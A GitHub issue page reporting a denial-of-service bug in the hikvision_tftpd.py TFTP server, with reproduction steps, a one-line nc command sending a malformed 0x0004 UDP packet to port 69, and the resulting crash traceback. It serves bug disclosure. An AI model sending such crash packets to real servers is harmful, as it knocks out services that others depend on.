We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There is a Denied-of-Service bug in the _tftp_read function in theServer class on the parse of a packet with content 0x0004.
_tftp_read
Server
0x0004
Download the firmware digicap.dav to the root directory of the project from hikvisioneurope.
digicap.dav
python hikvision_tftpd.py --server-ip 127.0.0.1
Send a UDP packet with the following payload:
echo -n "0004" | xxd -r -p | nc -u 127.0.0.1 69
Then, the server will crash and the logs are as follows:
Setting block size to 512 Serving 22651096-byte digicap.dav (block size 512, 44241 blocks) Traceback (most recent call last): File "hikvision_tftpd.py", line 193, in <module> server.run_forever() File "hikvision_tftpd.py", line 102, in run_forever self._iterate() File "hikvision_tftpd.py", line 110, in _iterate self._tftp_read() File "hikvision_tftpd.py", line 139, in _tftp_read '>H', pkt[len(self._TFTP_ACK_PREFIX):]) struct.error: unpack requires a string argument of length 2
The text was updated successfully, but these errors were encountered:
No branches or pull requests
There is a Denied-of-Service bug in the
_tftp_read
function in theServer
class on the parse of a packet with content0x0004
.Reproduce
1. Prepare
Download the firmware
digicap.dav
to the root directory of the project from hikvisioneurope.2. Start the Server
3. Attack
Send a UDP packet with the following payload:
Then, the server will crash and the logs are as follows:
The text was updated successfully, but these errors were encountered: